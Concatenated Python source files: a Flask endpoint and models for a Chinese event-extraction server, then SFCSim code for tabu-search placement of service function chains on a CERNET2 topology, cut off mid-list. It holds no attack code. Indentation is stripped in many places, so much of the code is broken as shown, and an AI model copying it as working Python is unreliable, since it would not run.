result_data = []
for result in results:
            result_data.append(result.as_dict())
return jsonify(code=20000, flag=True, message="查询成功", data={"total": len(result_data), "rows": result_data})
except Exception as e:
print(e)
return jsonify(code=20001, flag=False, message="查询分析结果失败")
@eventResultApi.route('/detail/<project_id>/<text_id>', methods=['GET'])
def get_event_detail(project_id, text_id):
project = AnalysisProject.query.get(project_id)
    # fetch the source text (content)
textlib_id = project.textlibrary_id
textlibrary_data_tablename = 'rs_textlibrary_data_%s' % textlib_id
TextLibraryData.__table__.name = textlibrary_data_tablename
text_data = TextLibraryData.query.get(text_id)
text_dict = text_data.as_dict()
paragraphs = text_data.content.decode("utf-8").split(u"\u3000")
# remove the empty str
paragraphs = filter(None, paragraphs)
res = []
for p in paragraphs:
p = '\t' + p
res.append(p)
text_dict.update({"content": res})
    # fetch the stored analysis result
result_tablename = 'rs_analysis_event_result_%s' % project_id
AnalycisEventResult.__table__.name = result_tablename
result = AnalycisEventResult.query.filter(AnalycisEventResult.text_id == text_id).all()
result = result[0].as_dict()['event_result']
result = json.loads(result, encoding='utf-8',strict=False)
results = []
for i_result in result:
origin = i_result["origin"].split(" ")
content = i_result["content"].encode("utf-8")
# get Source
source = origin[2]
if "source" in i_result and i_result["source"] != '---':
source = i_result["source"]
target = origin[3]
if "target" in i_result and i_result["target"] != '---':
target = i_result["target"]
if "eventroot" in i_result and i_result["eventroot"] != '---':
ls = i_result["eventroot"].split(" ")
if len(ls) > 1:
event_code = i_result["eventroot"].split(" ")[1]
else:
event_code = i_result["eventroot"].split(" ")[0]
else:
event_code = origin[4]
event_code += " "
if "eventtext" in i_result:
event_code += i_result["eventtext"]
else:
event_code += "---"
results.append({"source": source, "target": target, "event": event_code, "location": i_result["location"],
"rs": source+" " + event_code + " " + target, "content": content,"sentenceTime": i_result["sentenceTime"]})
return jsonify(code=20000, flag=True, message="查询成功", text=text_dict, events=results)
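# Response sketch (illustrative): get_event_detail above returns JSON roughly shaped like
#   {
#     "code": 20000, "flag": true, "message": "查询成功",
#     "text": { ...TextLibraryData fields..., "content": ["paragraph 1", "paragraph 2", ...] },
#     "events": [
#       {"source": "...", "target": "...", "event": "<event code> <event text>",
#        "location": "...", "rs": "<source> <event> <target>",
#        "content": "...", "sentenceTime": "..."}
#     ]
#   }
# The concrete keys inside each event come from the stored petrarch result and may vary.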
```
#### File: resource/model/analysisProjectResultModelSubThread.py
```python
from resource import db
class AnalycisEventResultSubThread(db.Model):
    # event-extraction result row (one per analysed text)
id = db.Column(db.Integer, primary_key=True)
text_id = db.Column(db.String(255))
recall_rate = db.Column(db.DECIMAL)
accuracy_rate = db.Column(db.DECIMAL)
event_num = db.Column(db.Integer)
event_result = db.Column(db.Text)
def as_dict(self):
return {c.name: getattr(self, c.name) for c in self.__table__.columns}
def __repr__(self):
return '<Analysis_Event_Result {}>'.format(self.id)
```
#### File: PetrarchChineseServer/resource/mysqldb.py
```python
# -*- coding: utf-8 -*-
# import mysql.connector
#
#
# def get_db():
# mydb = mysql.connector.connect(
# host="192.168.3.11",
# user="root",
# passwd="<PASSWORD>",
# database="SoftwareEngineering"
# )
#
# return mydb
#
#
# def create_textlib_date(textlib_id):
# table_name = 'rs_textlibrary_data_%s' % textlib_id
# drop_sql = 'DROP TABLE IF EXISTS {};'.format(table_name)
# create_sql = 'CREATE TABLE IF NOT EXISTS {}(' \
# 'id int(11) not null primary key,' \
# 'title varchar(255),' \
# 'summary text,' \
# 'keywords varchar(255),' \
# 'publish_time datetime,' \
# 'author varchar(255),' \
# 'source varchar(255),' \
# 'page varchar(20),' \
# 'content text,' \
# 'url varchar(512),' \
# 'publish_source varchar(255),' \
# 'create_time datetime,' \
# 'is_delete int(11)' \
# ');'.format(table_name)
#
# mydb = get_db()
# cursor = mydb.cursor()
# cursor.execute(drop_sql)
# cursor.execute(create_sql)
# mydb.commit()
#
# db_sql = 'show databases'
# cursor.execute(db_sql)
# print(cursor.fetchall())
# mydb.disconnect()
#
# def create_analysis_result(project_id):
# table_name = 'rs_analysis_event_result_%s' % project_id
# drop_sql = 'DROP TABLE IF EXISTS {}'.format(table_name)
# create_sql = 'create table IF NOT EXISTS {}(' \
# 'id int(20) not null primary key,'\
# 'text_id varchar(255) not null,'\
# 'recall_rate decimal(10,2) not null,'\
# 'accuracy_rate decimal(10,2) not null,'\
# 'event_num int(11) not null,'\
# 'event_result text not null'\
# ')'.format(table_name)
#
# def test():
# # dynamically create the two kinds of tables; nothing is returned
# create_textlib_date('1')
# # create_analysis_result('1')
#
# # standalone call that executes an arbitrary SQL statement
# mydb = get_db()
# cursor = mydb.cursor()
#
# sql = "INSERT INTO `SoftwareEngineering`.`test` (`id`, `testcol`) VALUES (%s, %s);"
# # sql = "SELECT * FROM SoftwareEngineering.test;"
# val = ("4", "444")
# # cursor.execute(sql, val)
# db_sql = "SHOW DATABASES"
# cursor.execute(db_sql)
# result = cursor.fetchone()
# # mydb.commit()
# print(result)
# mydb.disconnect()
#
# if __name__ == '__main__':
# test()
``` |
{
"source": "1547591994/SFCSim",
"score": 3
} |
#### File: sfcsim/algorithms/common.py
```python
import numpy as np
def show_solutions(solutions,sfc_id):
print(sfc_id,' ',len(solutions[sfc_id]))
for solution in solutions[sfc_id]:
print(' ',solution)
def find_all_path(graph,start,end,path=[]):  # find every path between two nodes of the network
    path = path + [start]
    if start == end:
        return [path]
    paths = []  # all paths found so far
    for node in graph[start]:
        if node not in path:
            newpaths = find_all_path(graph,node,end,path)
            for newpath in newpaths:
                paths.append(newpath)
    return paths
def find_network_all_path(graph):  # find all paths between every pair of network nodes
paths={}
nodes=graph.nodes
for node1 in nodes:
paths[node1]={}
for node2 in nodes:
if node2 !=node1:
paths[node1][node2]=find_all_path(graph,node1,node2)
return paths
def is_condition_met(datas):  # check that the values in datas are non-decreasing
lens=len(datas)-1
for j in range(lens):
if(datas[j]>datas[j+1]):
return False
return True
def count_mode(nf_number,node_number):  # enumerate the feasible placements of nf_number NFs along a single path
sum=int((node_number**nf_number-1))
deploy=[]
for count in range(sum+1):
datas=np.zeros((nf_number,), dtype=int)
data=count
i=0
while(data>0):
datas[nf_number-1-i]=(data%node_number)
data=int(data/node_number)
i=i+1
if is_condition_met(datas)==True:
deploy.append(list(datas))
return deploy
def get_deploy_from(path,sfc,mode):
    lens=len(mode)
    solution={'node':{},'edge':{}}
    for i in range(lens):
        solution['node'][i+1]=path[mode[i]].get_id()  # record where each NF is placed
        edge=[]
        if i ==0:  # record the virtual-link mapping
            for j in range(mode[0]+1):
                edge.append(path[j].get_id())
        else:
            for j in range(mode[i-1],mode[i]+1):
                edge.append(path[j].get_id())
        if len(edge)==0:  # both NFs sit on the same node, so the link stays inside it
            edge=[path[mode[i-1]].get_id(),path[mode[i-1]].get_id()]
        elif len(edge)==1:
            edge.append(edge[0])
        solution['edge'][i+1]=edge
edge=[]
for j in range(mode[lens-1],len(path)):
edge.append(path[j].get_id())
if len(edge)==1:
edge.append(sfc.get_out_node())
solution['edge'][lens+1]=edge
return solution
def find_sfc_solution(path,sfc):  # enumerate every deployment of one sfc along a path, returned as string-style records
nf_number=sfc.get_length()-2
node_number=len(path)
deploy_modes=count_mode(nf_number,node_number)
solution=[]
for mode in deploy_modes:
solution.append(get_deploy_from(path,sfc,mode))
return deploy_modes,solution
def get_path_delays(network,path):
lens=len(path)-1
delay=0
for i in range(lens):
delay=delay+network.G[path[i]][path[i+1]]['delay']
return delay
def find_sfcs_solutions(network,sfcs,n=1):  # find all deployment options of every sfc, stored as a dict {'sfc1':[{},{},{}], ...}
all_paths=find_network_all_path(network.G)
all_solutions={}
all_modes={}
for sfc in sfcs.get_sfcs():
all_solutions[sfc.get_id()]=[]
solutions=[]
modes=[]
sfc_paths=all_paths[network.get_node(sfc.get_in_node())][network.get_node(sfc.get_out_node())]
path_length=[]
        for path in sfc_paths:  # rank the paths and keep only the n with the lowest delay
path_length.append(get_path_delays(network,path))
index=np.array(path_length).argsort()
lens=n if len(sfc_paths)>n else len(sfc_paths)
sfc_paths2=[]
for i in range(lens):
sfc_paths2.append(sfc_paths[index[i]])
for path in sfc_paths2:
            if get_path_delays(network,path)<sfc.get_delay():  # the path satisfies the delay requirement
                mode,solution=find_sfc_solution(path,sfc)
                modes.extend(mode)
                solutions.extend(solution)  # collect every deployment of the sfc on this path
all_modes[sfc.get_id()]=modes
all_solutions[sfc.get_id()]=solutions
return all_modes,all_solutions
def records_node_to_str(records):  # convert node-object deployment records into string (node-id) records
new_records={}
for sfc_id in records:
new_records[sfc_id]={'node':{},'edge':{}}
for key in records[sfc_id]:
if key =='node':
for num in records[sfc_id][key]:
new_records[sfc_id][key][num]=records[sfc_id][key][num].get_id()
elif key =='edge':
for num in records[sfc_id][key]:
path=[]
for node in records[sfc_id][key][num]:
path.append(node.get_id())
new_records[sfc_id][key][num]=path
return new_records
def records_str_to_num(records,all_sfc_deploy_records):  # convert string deployment records into numeric (index) records
new_records={}
for sfc_id in all_sfc_deploy_records:
if sfc_id in records :
if (records[sfc_id] !=-1) :
lens=len(all_sfc_deploy_records[sfc_id])
for i in range(lens):
if(all_sfc_deploy_records[sfc_id][i] == records[sfc_id]):
new_records[sfc_id]=i
else:
new_records[sfc_id]=-1
else:
new_records[sfc_id]=-1
return(new_records)
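# Usage sketch (object names are assumptions): find_sfcs_solutions expects a network object
# exposing G / get_node() and an sfcs container, e.g. the cernnet2 topology defined elsewhere
# in this repository:
#
#   net = cernnet2()
#   modes, solutions = find_sfcs_solutions(net, net.sfcs, n=2)   # keep the 2 lowest-delay paths
#   show_solutions(solutions, 'sfc1')
#
# Each entry of solutions['sfc1'] is a record such as
#   {'node': {1: 'node5', ...}, 'edge': {1: ['node16', 'node5'], ...}}
# mapping every NF of the chain to a node and every virtual link to a node path.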
```
#### File: sfcsim/algorithms/TS_scheduler.py
```python
from sfcsim.classes import *
from sfcsim.algorithms import common
import time
class TS_scheduler(dynamic_scheduler):
    def __init__(self,tabu_length=10,iteration=50,stop_condition=5,log=False):  # log=False means the deployment procedure is not printed
super(TS_scheduler, self).__init__(log=log)
self.tabu_list=[]
self.tabu_length=tabu_length
self.stop_condition=stop_condition
        self.iteraction_count=iteration  # maximum number of iterations
        self.max_deploy_record={}  # best solution found so far (record form)
        self.max_deploy_solution={}  # best solution found so far (numeric form)
        self.global_max_deploy_record={}  # best solution seen globally
        self.grade_list=[]  # best score of every iteration
        ###############################################
        self.all_sfc_deploy_solutions={}  # every feasible plan per sfc, as a dict {'sfc1':[{},{},{}],...}
        self.solutions_length={}  # number of candidate deployments per sfc
        self.last_num=0  # solution index before the last neighbourhood move
    # remove every sfc/vnf deployment from the network and clear the records
def clear_network(self,network,sfcs):
records_list=[]
for sfc_id in self.get_records():
            records_list.append(sfc_id)  # copy the keys first so the dict does not change size while iterating
for i in records_list:
self.remove_sfc(sfcs.get_sfc(i),network)
for node in network.get_nodes():
vnfs=network.get_vnfs(node.get_id())
vnfs_list=[]
for j in range(len(vnfs)):
vnfs_list.append(vnfs[j].get_name())
for i in vnfs_list:
network.delete_vnf(node.get_id(),i)
    # total traffic of the services that are fully deployed in a record
def check_score(self,record,sfcs):
grade=0
for sfc_id in record:
if 'node' in record[sfc_id] and 'edge' in record[sfc_id]:
if len(record[sfc_id]['node'])== sfcs.get_length(sfc_id)-2 and len(record[sfc_id]['edge'])== sfcs.get_length(sfc_id)-1:
for bandwidth in sfcs.get_bandwidths(sfc_id):
grade=grade+bandwidth
return grade
    # apply a deployment record to the network and return the resulting fitness
    def deploy_sfc_by_records(self,sfcs,network,vnf_types,records):  # deploy every service function chain from a record
for sfc_id in records:
            if records[sfc_id] !=-1:  # -1 means this sfc is not deployed at all
log=True
sfc=sfcs.get_sfc(sfc_id)
for i in records[sfc_id]['node']:
if self.deploy_nf_scale_out(sfc,network.get_node(records[sfc_id]['node'][i]),i,vnf_types)!=True:
if sfc_id in self.get_records():
self.remove_sfc(sfc,network)
log=False
if log==False:
break #跳出1层循环
if log==False: #这条条sfc部署失败,执行下一条sfc的部署
continue
for j in records[sfc_id]['edge']:
edge_list=records[sfc_id]['edge'][j]
edge=[]
for m in range(len(edge_list)):
edge.append(network.get_node(edge_list[m]))
if self.deploy_link(sfc,j,network,edge)!=True: #链路部署失败,则将sfc删除
if sfc.get_id() in self.get_records():
self.remove_sfc(sfc,network)
log=False
if log==False:
break #跳出1层循环
fit=0
record=self.get_records()
        for sfc_id in record:  # sum the bandwidth of every fully deployed sfc
if 'node' in record[sfc_id] and 'edge' in record[sfc_id]:
if len(record[sfc_id]['node'])== sfcs.get_length(sfc_id)-2 and len(record[sfc_id]['edge'])== sfcs.get_length(sfc_id)-1:
for bandwidth in sfcs.get_bandwidths(sfc_id):
fit=fit+bandwidth
self.clear_network(network,sfcs)
return fit
    # apply a neighbourhood move and obtain the new deployment solution
def get_new_deploy_solution(self,neighbour):
self.last_num=copy.deepcopy(self.max_deploy_solution[neighbour[0]])
if neighbour[1] !=0:
self.max_deploy_solution[neighbour[0]]+=neighbour[1]
self.max_deploy_record[neighbour[0]]=self.all_sfc_deploy_records[neighbour[0]][self.max_deploy_solution[neighbour[0]]]
else:
self.max_deploy_solution[neighbour[0]]=-1
self.max_deploy_record[neighbour[0]]=-1
    # roll back to the solution that existed before the neighbourhood move
def get_last_deploy_solution(self,neighbour):
self.max_deploy_solution[neighbour[0]]=self.last_num
if self.last_num!=-1:
self.max_deploy_record[neighbour[0]]=self.all_sfc_deploy_records[neighbour[0]][self.max_deploy_solution[neighbour[0]]]
else:
self.max_deploy_record[neighbour[0]]=-1
    # neighbourhood moves available for a single sfc
def get_neighbour(self,sfc_id):
neighbour=[]
num=self.max_deploy_solution[sfc_id]
        max_num=self.solutions_length[sfc_id]  # number of candidate deployments for this sfc
if num>0 :
neighbour.append((sfc_id,-1))
if num<max_num-1:
neighbour.append((sfc_id,1))
if num!=-1:
            neighbour.append((sfc_id,0))  # 0 means "do not deploy this sfc"
# print('neighbour=>',neighbour)
return neighbour
    # all neighbourhood moves of the current solution
def get_neighbours(self):
neighbours=[]
for sfc_id in self.max_deploy_record:
neighbours.extend(self.get_neighbour(sfc_id))
return neighbours
    # check whether a move (or its inverse) is currently in the tabu list
    def is_in_tabu_list(self,neighbour):
lens=len(self.tabu_list)
for data in self.tabu_list:
if data[0]== neighbour[0] and data[1] == -neighbour[1]: #
return True
return False
    # evaluate the fitness of every neighbourhood move
def calculate_fits(self,sfcs,network,vnf_types,neighbours):
fits=[]
for neighbour in neighbours:
            self.get_new_deploy_solution(neighbour)  # move into the neighbouring solution
fits.append(self.deploy_sfc_by_records(sfcs,network,vnf_types,self.max_deploy_record))
            self.get_last_deploy_solution(neighbour)  # roll back to the previous best solution
return fits
    # perform one tabu-search iteration
def single_search(self,network,sfcs,vnf_types):
        neighbours=self.get_neighbours()  # candidate moves, e.g. neighbours=[('sfc1',1),('sfc2',1),...]
# print('neighbours=>',neighbours)
        fits=self.calculate_fits(sfcs,network,vnf_types,neighbours)  # fitness of every move
        candidate_grade=max(fits)  # best fitness found
        neighbour=neighbours[fits.index(candidate_grade)]  # move that produced it
        if candidate_grade > self.max_grade:  # aspiration criterion: accept even a tabu move if it beats the best score
print('************ new solution***********')
self.max_grade = candidate_grade
if self.is_in_tabu_list(neighbour):
self.tabu_list.remove(neighbour)
self.tabu_list.append(neighbour)
            if len(self.tabu_list) > self.tabu_length:  # drop the oldest move once the tabu list is full
self.tabu_list.remove(self.tabu_list[0])
self.get_new_deploy_solution(neighbour)
self.global_max_deploy_record=copy.deepcopy(self.max_deploy_record)
return True
else:
print('************ old solution***********')
while(self.is_in_tabu_list(neighbour)):
                fits[fits.index(candidate_grade)]=-1  # discard the tabu move by giving it the lowest score
                candidate_grade=max(fits)
                neighbour=neighbours[fits.index(candidate_grade)]  # move with the next-best fitness
self.tabu_list.append(neighbour)
            if len(self.tabu_list) > self.tabu_length:  # drop the oldest move once the tabu list is full
self.tabu_list.remove(self.tabu_list[0])
            self.get_new_deploy_solution(neighbour)  # adopt the selected move
return False
    # initialise the search and pre-compute frequently used quantities
def init(self,init_record,network,sfcs):
self._scheduler__records=init_record
self._dynamic_scheduler__records=init_record
        self.__records=self.get_records()  # initial solution
        self.max_grade=self.check_score(init_record,sfcs)  # initial objective value
        self.all_sfc_deploy_solutions,self.all_sfc_deploy_records=common.find_sfcs_solutions(network,sfcs,1)  # all feasible deployments: numeric records first, string records second
        for sfc_id in self.all_sfc_deploy_solutions:  # deployment options of every sfc
            self.solutions_length[sfc_id]=len(self.all_sfc_deploy_solutions[sfc_id])
        self.max_deploy_record=common.records_node_to_str(self.get_records())  # best solution in string form
for sfc_id in self.all_sfc_deploy_records:
if sfc_id not in self.max_deploy_record:
self.max_deploy_record[sfc_id]=-1
self.max_deploy_solution=common.records_str_to_num(self.max_deploy_record,self.all_sfc_deploy_records)
self.clear_network(network,sfcs)
    # main entry point
def deploy_sfcs(self,network,sfcs,vnf_types,init_record):
start = time.clock()
self.init(init_record,network,sfcs)
for i in range(self.iteraction_count):
            if self.single_search(network,sfcs,vnf_types)==True:  # one search iteration
count=0
else:
count=count+1
self.grade_list.append(self.max_grade)
end = time.clock()
print('time=>',end-start,'s','max grade=>',self.max_grade)
            if(count>self.stop_condition):
                print("No better solution found for %d iterations, stopping early"%(self.stop_condition))
                break
end = time.clock()
print('execution time=>',end-start,'s')
print('optimal solution=>',self.max_grade,' =>',self.global_max_deploy_record)
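# Usage sketch (names are assumptions, values illustrative): the scheduler is driven through
# deploy_sfcs(); a minimal run on the cernnet2 topology defined elsewhere in this repository
# could look like:
#
#   network = cernnet2()
#   scheduler = TS_scheduler(tabu_length=10, iteration=50, stop_condition=5)
#   scheduler.deploy_sfcs(network, network.sfcs, network.vnf_types, init_record={})
#
# init_record is the starting deployment ({} means nothing is deployed yet); the best record
# found is kept in scheduler.global_max_deploy_record and the per-iteration scores in
# scheduler.grade_list.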
```
#### File: sfcsim/classes/mobiel_sfc.py
```python
from sfcsim.classes.sfc import *
class mobile_sfc(sfc):
    '''
    mobile_sfc: an sfc whose ingress node moves over time; see the network base-class design notes.
    Attributes:
        id          unique identifier of the sfc
        atts        sfc attributes, containing:
            in_node     current ingress node
            in_nodes    every ingress node the user will move through
            out_node    egress node
            nfs         ordered set of network functions
            bandwidths  bandwidth of each virtual link
            delay       delay requirement
            duration    service duration (per ingress node)
            profit      profit
            nfs_detail  derived details of the nfs (generated internally)
        type        sfc type, generated internally, defaults to 1
        vnf_types   the global vnf_types instance; an sfc only exists for known vnf types
    Methods:
        mainly the get/set/show helpers inherited from sfc
    '''
def __init__(self,uuid,in_nodes,out_node,nfs=[],bandwidth=0,delay=0,duration=0,profit=0,vnf_types=[]):
        if type(duration)==type([]):  # when duration is a list it must have one entry per ingress node
            if len(in_nodes)!= len(duration):
                print('the length of duration must be the same as the length of in_nodes')
                return False
super(mobile_sfc, self).__init__(uuid=uuid,in_node=in_nodes[0],out_node=out_node,nfs=nfs,bandwidth=bandwidth,\
delay=delay,duration=duration,profit=profit,vnf_types=vnf_types)
self.atts['in_nodes']=in_nodes
self.type=1
    def set_atts(self,atts):
        for key in atts:
            if key in self.atts or key=='bandwidth':
                if key =='nfs':
                    self.atts[key]=atts[key]
                    # NOTE: the source referenced a bare, undefined `vnf_types`; the instance attribute is assumed here
                    if self.vnf_types!=[]:
                        self.atts['bandwidths']=super()._sfc__calculate_link_bw(self.atts['bandwidths'][0])
                        self.atts['nfs_detail']=super()._sfc__calculate_resource(self.atts['nfs'])
                elif key =='nfs_detail':
                    print('error!!!you can\'t set nfs_detail, it is calculated automatically')
                elif key =='in_nodes':
                    self.atts[key]=atts[key]
                    self.atts['in_node']=atts[key][0]
                elif key=='bandwidth':
                    if self.vnf_types!=[]:
                        self.atts['bandwidths']=super()._sfc__calculate_link_bw(atts[key])
                        self.atts['nfs_detail']=super()._sfc__calculate_resource(self.atts['nfs'])
                    else:
                        self.atts['bandwidths']=[atts[key]]  # the source used an undefined `bandwidth` name here
                else:
                    self.atts[key]=atts[key]
            else:
                print('warning!!! no such key:',key)
    def next_cycle(self):  # called by the dynamic scheduler once per cycle to refresh the sfc state
        self.atts['service_time']+=1
        service_time=self.atts['service_time']  # service_time advanced by one
        if type(self.atts['duration'])==type([]):  # non-uniform dwell times: locate the current period
            index=-1
            while(service_time>=0):
                index=index+1
                if(index==len(self.atts['in_nodes'])-1):  # reached the last period
                    if self.atts['duration'][index]==0:  # a 0 duration means the sfc stays static from now on
                        return False
                    else:
                        service_time=service_time-self.atts['duration'][index]
                elif (index>len(self.atts['in_nodes'])-1):  # past the last period
                    return True
                else:
                    service_time=service_time-self.atts['duration'][index]
        else:
            index=int(service_time/self.atts['duration'])  # uniform dwell time: locate the current period
        if (index>len(self.atts['in_nodes'])-1):  # past the last period
            return True
        if self.atts['in_nodes'][index]==self.atts['in_node']:  # ingress node unchanged, the user has not moved
            return False
        else:
            self.atts['in_node']=self.atts['in_nodes'][index]  # ingress node updated, the user has moved
            return True
    def is_life_end(self):  # after next_cycle(), check whether the sfc has reached the end of its lifetime
        if type(self.atts['duration']) !=type([]):  # duration given as a single fixed value
            if self.atts['service_time']>=self.atts['duration']*len(self.atts['in_nodes']):
                return True
            else:
                return False
        elif self.atts['duration'][len(self.atts['duration'])-1] ==0:  # last period is static, so the sfc never ends
            return False
        else:
            service_time=self.atts['service_time']
            for data in self.atts['duration']:
                service_time=service_time-data
            if(service_time<0):
                return False
            return True
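# Construction sketch (argument values are illustrative; vnf_types stands for an existing
# vnf_types instance): a mobile_sfc is built like a plain sfc except that in_nodes lists every
# ingress node the user moves through and duration is either a single dwell time or one entry
# per node:
#
#   msfc = mobile_sfc('msfc1', in_nodes=['node1', 'node3', 'node5'], out_node='node9',
#                     nfs=['type1', 'type2'], bandwidth=0.5, delay=8,
#                     duration=[3, 3, 0], profit=0, vnf_types=vnf_types)
#
# Calling msfc.next_cycle() once per scheduling round returns True whenever the ingress node
# changed (the user moved), signalling that the deployment has to be updated.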
```
#### File: sfcsim/networks/cernnet2.py
```python
from sfcsim.classes.network import *
from sfcsim.classes.sfc import *
from sfcsim.layout.cernnet2_layout import *
class cernnet2(network):
    '''
    Open challenge from the research group. Goal: deploy the sfcs listed in this file on the
    substrate network; the winner is the algorithm with the shortest run time and the largest
    total deployed traffic.
    Attributes (cernnet2 inherits from network and can use all of its methods). The substrate
    topology follows the CERNET2 structure, see http://www.cernet20.edu.cn/introduction.shtml
        nodes      node resources drawn from U(10~30)
        G          link delays drawn from U(0.5,1.5) (ms)
        vnf_types  vnf_types instance, the set of all vnf types (eight in total)
        sfcs       sfcs instance, the target service function chains to deploy
                   mMTC  30 chains, delay U(5,10),  traffic 0.1~0.5G, length 3~5 nfs
                   uRLLC 10 chains, delay U(2,4),   traffic 1~2G,     length 1~2 nfs
                   eMBB   6 chains, delay U(5,10),  traffic 3~4G,     length 3~5 nfs
    The following calls print the underlying data structures:
        cernnet.vnf_types.show()
        cernnet.sfcs.show()
        cernnet.show()
        cernnet.draw()
    '''
def __init__(self):
self.node1=node(uuid='node1',atts={'cpu':10,'access':False})
self.node2=node(uuid='node2',atts={'cpu':10,'access':False})
self.node3=node(uuid='node3',atts={'cpu':10,'access':False})
self.node4=node(uuid='node4',atts={'cpu':10,'access':False})
self.node5=node(uuid='node5',atts={'cpu':10,'access':False})
self.node6=node(uuid='node6',atts={'cpu':10,'access':False})
self.node7=node(uuid='node7',atts={'cpu':10,'access':False})
self.node8=node(uuid='node8',atts={'cpu':10,'access':False})
self.node9=node(uuid='node9',atts={'cpu':10,'access':False})
self.node10=node(uuid='node10',atts={'cpu':10,'access':False})
self.node11=node(uuid='node11',atts={'cpu':10,'access':False})
self.node12=node(uuid='node12',atts={'cpu':10,'access':False})
self.node13=node(uuid='node13',atts={'cpu':10,'access':False})
self.node14=node(uuid='node14',atts={'cpu':10,'access':False})
self.node15=node(uuid='node15',atts={'cpu':10,'access':False})
self.node16=node(uuid='node16',atts={'cpu':10,'access':False})
self.node17=node(uuid='node17',atts={'cpu':10,'access':False})
self.node18=node(uuid='node18',atts={'cpu':10,'access':False})
self.node19=node(uuid='node19',atts={'cpu':10,'access':False})
self.node20=node(uuid='node20',atts={'cpu':10,'access':False})
self.node21=node(uuid='node21',atts={'cpu':10,'access':False})
server_nodes=[self.node1,self.node2,self.node3,self.node4,self.node5,self.node6,self.node7,self.node8,self.node9,self.node10,\
self.node11,self.node12,self.node13,self.node14,self.node15,self.node16,self.node17,self.node18,self.node19,self.node20,self.node21]
access_nodes=[]
network.__init__(self,server_nodes+access_nodes)
self.generate_edges()
self.generate_nodes_atts()
self.generate_edges_atts()
self.vnf_types=vnf_types(vnf_types=[(vnf_type(name='type1',atts={'cpu':0},ratio=0.8,resource_coefficient={'cpu':1}))\
,vnf_type(name='type2',atts={'cpu':0},ratio=0.8,resource_coefficient={'cpu':1})\
,vnf_type(name='type3',atts={'cpu':0},ratio=1.2,resource_coefficient={'cpu':1.8})\
,vnf_type(name='type4',atts={'cpu':0},ratio=1.5,resource_coefficient={'cpu':1.5})\
,vnf_type(name='type5',atts={'cpu':0},ratio=1,resource_coefficient={'cpu':1.4})\
,vnf_type(name='type6',atts={'cpu':0},ratio=1,resource_coefficient={'cpu':1.2})\
,vnf_type(name='type7',atts={'cpu':0},ratio=0.8,resource_coefficient={'cpu':1.2})\
,vnf_type(name='type8',atts={'cpu':0},ratio=1,resource_coefficient={'cpu':2})])
self.sfcs=sfcs([
        # uRLLC
sfc('sfc31','node16','node20',['type1'],1.7,2,0,0,self.vnf_types),\
sfc('sfc32','node5','node9',['type4'],1.4,2,0,0,self.vnf_types),\
sfc('sfc33','node8','node19',['type5'],1.7,4,0,0,self.vnf_types),\
sfc('sfc34','node16','node15',['type8', 'type6'],1.1,4,0,0,self.vnf_types),\
sfc('sfc35','node12','node9',['type8'],1.0,3.5,0,0,self.vnf_types),\
sfc('sfc36','node21','node13',['type2', 'type4'],1.3,4,0,0,self.vnf_types),\
sfc('sfc37','node16','node8',['type7'],1.7,3,0,0,self.vnf_types),\
sfc('sfc38','node3','node12',['type6'],1.2,3.1,0,0,self.vnf_types),\
sfc('sfc39','node12','node21',['type4'],2.0,3,0,0,self.vnf_types),\
sfc('sfc40','node3','node20',['type4', 'type8'],1.3,4,0,0,self.vnf_types),\
#mMTC
sfc('sfc1','node6','node11',['type1', 'type7', 'type4', 'type8', 'type2'],0.2,7,0,0,self.vnf_types),\
sfc('sfc2','node21','node12',['type3', 'type6', 'type2', 'type8', 'type4'],0.2,10,0,0,self.vnf_types),\
sfc('sfc3','node21','node17',['type6', 'type5', 'type4', 'type2'],0.4,9,0,0,self.vnf_types),\
sfc('sfc4','node17','node13',['type1', 'type7', 'type3', 'type6', 'type2'],0.4,10,0,0,self.vnf_types),\
sfc('sfc5','node11','node15',['type1', 'type8', 'type6'],0.5,10,0,0,self.vnf_types),\
sfc('sfc6','node20','node3',['type7', 'type5', 'type4'],0.5,7,0,0,self.vnf_types),\
sfc('sfc7','node2','node3',['type8', 'type6', 'type4', 'type1', 'type2'],0.2,7,0,0,self.vnf_types),\
sfc('sfc8','node19','node3',['type4', 'type1', 'type2', 'type8', 'type7'],0.3,5,0,0,self.vnf_types),\
sfc('sfc9','node19','node4',['type2', 'type5', 'type1', 'type6'],0.2,8,0,0,self.vnf_types),\
sfc('sfc10','node15','node13',['type5', 'type7', 'type1', 'type2'],0.3,10,0,0,self.vnf_types),\
sfc('sfc11','node9','node1',['type4', 'type6', 'type5', 'type1'],0.4,6,0,0,self.vnf_types),\
sfc('sfc12','node19','node16',['type3', 'type2', 'type8', 'type7', 'type4'],0.2,5,0,0,self.vnf_types),\
sfc('sfc13','node11','node10',['type7', 'type8', 'type5', 'type6'],0.2,10,0,0,self.vnf_types),\
sfc('sfc14','node20','node6',['type1', 'type4', 'type3', 'type8'],0.3,6,0,0,self.vnf_types),\
sfc('sfc15','node12','node20',['type7', 'type2', 'type3', 'type1'],0.4,9,0,0,self.vnf_types),\
sfc('sfc16','node15','node8',['type8', 'type2', 'type1', 'type6', 'type5'],0.2,8,0,0,self.vnf_types),\
sfc('sfc17','node1','node12',['type4', 'type5', 'type8', 'type7'],0.3,6,0,0,self.vnf_types),\
sfc('sfc18','node19','node6',['type5', 'type7', 'type6', 'type1', 'type8'],0.1,10,0,0,self.vnf_types),\
sfc('sfc19','node6','node4',['type1', 'type6', 'type5', 'type2'],0.4,6,0,0,self.vnf_types),\
sfc('sfc20','node21','node6',['type7', 'type6', 'type2', 'type5', 'type8'],0.4,6,0,0,self.vnf_types),\
sfc('sfc21','node6','node11',['type7', 'type1', 'type5'],0.1,10,0,0,self.vnf_types),\
sfc('sfc22','node19','node12',['type6', 'type1', 'type8', 'type2', 'type4'],0.5,10,0,0,self.vnf_types),\
sfc('sfc23','node21','node11',['type1', 'type6', 'type2', 'type4', 'type5'],0.1,10,0,0,self.vnf_types),\
sfc('sfc24','node8','node17',['type3', 'type6', 'type1', 'type8'],0.3,9,0,0,self.vnf_types),\
sfc('sfc25','node4','node18',['type4', 'type1', 'type7'],0.5,10,0,0,self.vnf_types),\
sfc('sfc26','node14','node19',['type8', 'type6', 'type2', 'type3', 'type1'],0.2,7,0,0,self.vnf_types),\
sfc('sfc27','node17','node12',['type3', 'type4', 'type8'],0.2,7,0,0,self.vnf_types),\
sfc('sfc28','node15','node3',['type8', 'type3', 'type7', 'type5'],0.2,8,0,0,self.vnf_types),\
sfc('sfc29','node21','node14',['type5', 'type3', 'type6', 'type8'],0.5,5,0,0,self.vnf_types),\
sfc('sfc30','node4','node20',['type3', 'type4', 'type1', 'type5'],0.2,9,0,0,self.vnf_types),\
#eMBB
